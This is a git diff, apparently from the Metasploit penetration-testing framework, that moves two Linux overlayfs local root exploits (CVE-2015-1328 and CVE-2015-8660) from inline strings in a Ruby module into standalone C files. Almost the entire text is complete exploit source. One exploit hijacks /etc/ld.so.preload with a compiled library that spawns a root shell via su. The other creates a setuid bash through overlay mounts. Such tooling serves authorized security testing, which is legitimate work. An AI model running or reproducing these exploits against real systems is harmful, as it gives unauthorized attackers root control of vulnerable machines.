diff --git a/external/source/exploits/CVE-2015-1328/1328.c b/external/source/exploits/CVE-2015-1328/1328.c new file mode 100644 index 0000000000..ac73c06ed4 --- /dev/null +++ b/external/source/exploits/CVE-2015-1328/1328.c @@ -0,0 +1,112 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n" + +static char child_stack[1024*1024]; + +static int +child_exec(void *stuff) +{ + char *file; + system("rm -rf /tmp/ns_sploit"); + mkdir("/tmp/ns_sploit", 0777); + mkdir("/tmp/ns_sploit/work", 0777); + mkdir("/tmp/ns_sploit/upper",0777); + mkdir("/tmp/ns_sploit/o",0777); + + fprintf(stderr,"mount #1\n"); + if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { +// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower + if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { + fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); + exit(-1); + } + file = ".access"; + chmod("/tmp/ns_sploit/work/work",0777); + } else file = "ns_last_pid"; + + chdir("/tmp/ns_sploit/o"); + rename(file,"ld.so.preload"); + + chdir("/"); + umount("/tmp/ns_sploit/o"); + fprintf(stderr,"mount #2\n"); + if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { + if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { + exit(-1); + } + chmod("/tmp/ns_sploit/work/work",0777); + } + + chmod("/tmp/ns_sploit/o/ld.so.preload",0777); + umount("/tmp/ns_sploit/o"); +} + +int +main(int argc, char **argv) +{ + int status, fd, lib; + pid_t wrapper, init; + int clone_flags = CLONE_NEWNS | SIGCHLD; + + fprintf(stderr,"spawning threads\n"); + + if((wrapper = fork()) == 0) { + if(unshare(CLONE_NEWUSER) != 0) + fprintf(stderr, "failed to create new user namespace\n"); + + if((init = fork()) == 0) { + pid_t pid = + clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); + if(pid < 0) { + fprintf(stderr, "failed to create new mount namespace\n"); + exit(-1); + } + + waitpid(pid, &status, 0); + + } + + waitpid(init, &status, 0); + return 0; + } + + usleep(300000); + + wait(NULL); + + fprintf(stderr,"child threads done\n"); + + fd = open("/etc/ld.so.preload",O_WRONLY); + + if(fd == -1) { + fprintf(stderr,"exploit failed\n"); + exit(-1); + } + + fprintf(stderr,"/etc/ld.so.preload created\n"); + fprintf(stderr,"creating shared library\n"); + lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); + write(lib,LIB,strlen(LIB)); + close(lib); + lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); + if(lib != 0) { + fprintf(stderr,"couldn't create dynamic library\n"); + exit(-1); + } + write(fd,"/tmp/ofs-lib.so\n",16); + close(fd); + system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); + execl("/bin/su","su",NULL); +} + diff --git a/external/source/exploits/CVE-2015-8660/8660.c b/external/source/exploits/CVE-2015-8660/8660.c new file mode 100644 index 0000000000..432368a108 --- /dev/null +++ b/external/source/exploits/CVE-2015-8660/8660.c @@ -0,0 +1,78 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +static char child_stack[1024*1024]; + +static int +child_exec(void *stuff) +{ + system("rm -rf /tmp/haxhax"); + mkdir("/tmp/haxhax", 0777); + mkdir("/tmp/haxhax/w", 0777); + mkdir("/tmp/haxhax/u",0777); + mkdir("/tmp/haxhax/o",0777); + + if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) { + fprintf(stderr,"mount failed..\n"); + } + + chmod("/tmp/haxhax/w/work",0777); + chdir("/tmp/haxhax/o"); + chmod("bash",04755); + chdir("/"); + umount("/tmp/haxhax/o"); + return 0; +} + +int +main(int argc, char **argv) +{ + int status; + pid_t wrapper, init; + int clone_flags = CLONE_NEWNS | SIGCHLD; + struct stat s; + + if((wrapper = fork()) == 0) { + if(unshare(CLONE_NEWUSER) != 0) + fprintf(stderr, "failed to create new user namespace\n"); + + if((init = fork()) == 0) { + pid_t pid = + clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); + if(pid < 0) { + fprintf(stderr, "failed to create new mount namespace\n"); + exit(-1); + } + + waitpid(pid, &status, 0); + + } + + waitpid(init, &status, 0); + return 0; + } + + usleep(300000); + + wait(NULL); + + stat("/tmp/haxhax/u/bash",&s); + + if(s.st_mode == 0x89ed) + execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL); + + fprintf(stderr,"couldn't create suid :(\n"); + return -1; +} diff --git a/modules/exploits/linux/local/overlayfs_priv_esc.rb b/modules/exploits/linux/local/overlayfs_priv_esc.rb index 73c973009d..50aec4c029 100644 --- a/modules/exploits/linux/local/overlayfs_priv_esc.rb +++ b/modules/exploits/linux/local/overlayfs_priv_esc.rb @@ -163,214 +163,14 @@ class MetasploitModule < Msf::Exploit::Local # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size - # Exploit Title: ofs.c - overlayfs local root in ubuntu - # Date: 2015-06-15 - # Exploit Author: rebel - # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) - # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 - # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) - - cve_2015_1328 = %q{ - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - - #define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n" - - static char child_stack[1024*1024]; - - static int - child_exec(void *stuff) - { - char *file; - system("rm -rf /tmp/ns_sploit"); - mkdir("/tmp/ns_sploit", 0777); - mkdir("/tmp/ns_sploit/work", 0777); - mkdir("/tmp/ns_sploit/upper",0777); - mkdir("/tmp/ns_sploit/o",0777); - - fprintf(stderr,"mount #1\n"); - if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { - // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower - if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { - fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); - exit(-1); - } - file = ".access"; - chmod("/tmp/ns_sploit/work/work",0777); - } else file = "ns_last_pid"; - - chdir("/tmp/ns_sploit/o"); - rename(file,"ld.so.preload"); - - chdir("/"); - umount("/tmp/ns_sploit/o"); - fprintf(stderr,"mount #2\n"); - if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { - if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { - exit(-1); - } - chmod("/tmp/ns_sploit/work/work",0777); - } - - chmod("/tmp/ns_sploit/o/ld.so.preload",0777); - umount("/tmp/ns_sploit/o"); - } - - int - main(int argc, char **argv) - { - int status, fd, lib; - pid_t wrapper, init; - int clone_flags = CLONE_NEWNS | SIGCHLD; - - fprintf(stderr,"spawning threads\n"); - - if((wrapper = fork()) == 0) { - if(unshare(CLONE_NEWUSER) != 0) - fprintf(stderr, "failed to create new user namespace\n"); - - if((init = fork()) == 0) { - pid_t pid = - clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); - if(pid < 0) { - fprintf(stderr, "failed to create new mount namespace\n"); - exit(-1); - } - - waitpid(pid, &status, 0); - - } - - waitpid(init, &status, 0); - return 0; - } - - usleep(300000); - - wait(NULL); - - fprintf(stderr,"child threads done\n"); - - fd = open("/etc/ld.so.preload",O_WRONLY); - - if(fd == -1) { - fprintf(stderr,"exploit failed\n"); - exit(-1); - } - - fprintf(stderr,"/etc/ld.so.preload created\n"); - fprintf(stderr,"creating shared library\n"); - lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); - write(lib,LIB,strlen(LIB)); - close(lib); - lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); - if(lib != 0) { - fprintf(stderr,"couldn't create dynamic library\n"); - exit(-1); - } - write(fd,"/tmp/ofs-lib.so\n",16); - close(fd); - system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); - execl("/bin/su","su",NULL); - } - } + path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-1328', '1328.c') + fd = ::File.open( path, "rb") + cve_2015_1328 = fd.read(fd.stat.size) # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size - # Exploit Title: overlayfs local root - # Date: 2016-01-05 - # Exploit Author: rebel - # Version: Ubuntu 14.04 LTS, 15.10 and more - # Tested on: Ubuntu 14.04 LTS, 15.10 - # CVE : CVE-2015-8660 - cve_2015_8660 = %q{ - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - - static char child_stack[1024*1024]; - - static int - child_exec(void *stuff) - { - system("rm -rf /tmp/haxhax"); - mkdir("/tmp/haxhax", 0777); - mkdir("/tmp/haxhax/w", 0777); - mkdir("/tmp/haxhax/u",0777); - mkdir("/tmp/haxhax/o",0777); - - if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) { - fprintf(stderr,"mount failed..\n"); - } - - chmod("/tmp/haxhax/w/work",0777); - chdir("/tmp/haxhax/o"); - chmod("bash",04755); - chdir("/"); - umount("/tmp/haxhax/o"); - return 0; - } - - int - main(int argc, char **argv) - { - int status; - pid_t wrapper, init; - int clone_flags = CLONE_NEWNS | SIGCHLD; - struct stat s; - - if((wrapper = fork()) == 0) { - if(unshare(CLONE_NEWUSER) != 0) - fprintf(stderr, "failed to create new user namespace\n"); - - if((init = fork()) == 0) { - pid_t pid = - clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); - if(pid < 0) { - fprintf(stderr, "failed to create new mount namespace\n"); - exit(-1); - } - - waitpid(pid, &status, 0); - - } - - waitpid(init, &status, 0); - return 0; - } - - usleep(300000); - - wait(NULL); - - stat("/tmp/haxhax/u/bash",&s); - - if(s.st_mode == 0x89ed) - execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL); - - fprintf(stderr,"couldn't create suid :(\n"); - return -1; - } - } + path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-8660', '8660.c') + fd = ::File.open( path, "rb") + cve_2015_8660 = fd.read(fd.stat.size) filename = rand_text_alphanumeric(8) executable_path = "#{datastore['WritableDir']}/#{filename}"